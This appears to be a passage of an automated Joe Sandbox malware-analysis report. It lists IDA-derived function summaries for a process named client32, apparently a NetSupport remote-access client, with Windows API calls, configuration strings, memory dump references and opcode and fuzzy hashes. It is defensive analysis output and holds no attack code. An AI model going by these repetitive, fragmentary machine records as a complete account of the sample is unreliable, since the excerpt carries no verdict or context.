                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                        • API String ID: 3779116287-2600120591
                                                                                        • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                        • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                        • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                        • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 3550192930-0
                                                                                        • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                        • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                        • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                        • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11143E97
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile$CloseHandle
                                                                                        • String ID: "
                                                                                        • API String ID: 1443461169-123907689
                                                                                        • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                        • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                        • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                        • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,B24479DC,756F13E0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                          • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                        • String ID: Client$DisableGeolocation
                                                                                        • API String ID: 3315423714-4166767992
                                                                                        • Opcode ID: 8190095f3405e2018add7d5113c2964d74450cef64a1333a0ab8e65d50805e67
                                                                                        • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                        • Opcode Fuzzy Hash: 8190095f3405e2018add7d5113c2964d74450cef64a1333a0ab8e65d50805e67
                                                                                        • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                        APIs
                                                                                        • GetMessageA.USER32 ref: 1102783A
                                                                                          • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                          • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
                                                                                          • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
                                                                                          • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                        • TranslateMessage.USER32(?), ref: 11027850
                                                                                        • DispatchMessageA.USER32(?,?,?,?,?,?,?,?,1103081D), ref: 11027856
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                        • API String ID: 3212272093-2210386016
                                                                                        • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                        • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                        • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                        • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 110179ED
                                                                                          • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 1101792C
                                                                                          • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                          • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                          • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                          • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 11017842
                                                                                          • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                          • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                          • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                                        • SetEvent.KERNEL32(00000188), ref: 11017A0D
                                                                                        • GetTickCount.KERNEL32 ref: 11017A13
                                                                                        Strings
                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                        • API String ID: 3804766296-4122679463
                                                                                        • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                        • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                        • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                        • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11138785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                        • String ID: *AutoICFConfig$Client
                                                                                        • API String ID: 3257255551-59951473
                                                                                        • Opcode ID: c7d02d57535ee59f71a844b0872d7ba7319e5239ed2d33223f252d9665e9b702
                                                                                        • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                        • Opcode Fuzzy Hash: c7d02d57535ee59f71a844b0872d7ba7319e5239ed2d33223f252d9665e9b702
                                                                                        • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • CreateThread.KERNEL32(00000000,00001000,11135700,00000000,00000000,1114239E), ref: 11135874
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113587B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                        • String ID: UnresponsiveTime$_debug
                                                                                        • API String ID: 3257255551-835906747
                                                                                        • Opcode ID: b48175bd2c60be259dcddfaaaa70841d4dc92ba9f5b8bd986b36e28d93775853
                                                                                        • Instruction ID: da03a37385785a02b027e482226a98526a2e13ea63ea6826a5b8101025715082
                                                                                        • Opcode Fuzzy Hash: b48175bd2c60be259dcddfaaaa70841d4dc92ba9f5b8bd986b36e28d93775853
                                                                                        • Instruction Fuzzy Hash: B2E0C239784318BBF66887E29E4AFB5FB1CE704B56F500158FB19A64C8DA917800C76A
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                        • String ID: Push
                                                                                        • API String ID: 1566154052-4278761818
                                                                                        • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                        • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                        • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                        • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                        • EnterCriticalSection.KERNEL32(JN,B24479DC,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                        • LeaveCriticalSection.KERNEL32(JN,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                        • String ID: JN
                                                                                        • API String ID: 3991485460-2143510404
                                                                                        • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                        • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                        • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                        • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                        APIs
                                                                                        • GetCommandLineA.KERNEL32 ref: 00AA1027
                                                                                        • GetStartupInfoA.KERNEL32 ref: 00AA107B
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00AA1096
                                                                                        • ExitProcess.KERNEL32 ref: 00AA10A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670583223.0000000000AA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670578615.0000000000AA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_aa0000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                        • String ID:
                                                                                        • API String ID: 2164999147-0
                                                                                        • Opcode ID: 0e52a0d73f2a01bec5dcb79b68fc8d47fd2d5b98bd90e71e6e9ca5430038e526
                                                                                        • Instruction ID: 42d479722b7d3081852afd13192a0deec21de3a909c3541e8fc4e01d88a637b6
                                                                                        • Opcode Fuzzy Hash: 0e52a0d73f2a01bec5dcb79b68fc8d47fd2d5b98bd90e71e6e9ca5430038e526
                                                                                        • Instruction Fuzzy Hash: 051100244083C57AEB319FA488487EABFA59F03395F240048ECD7971C6D3524CC7C3A0
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
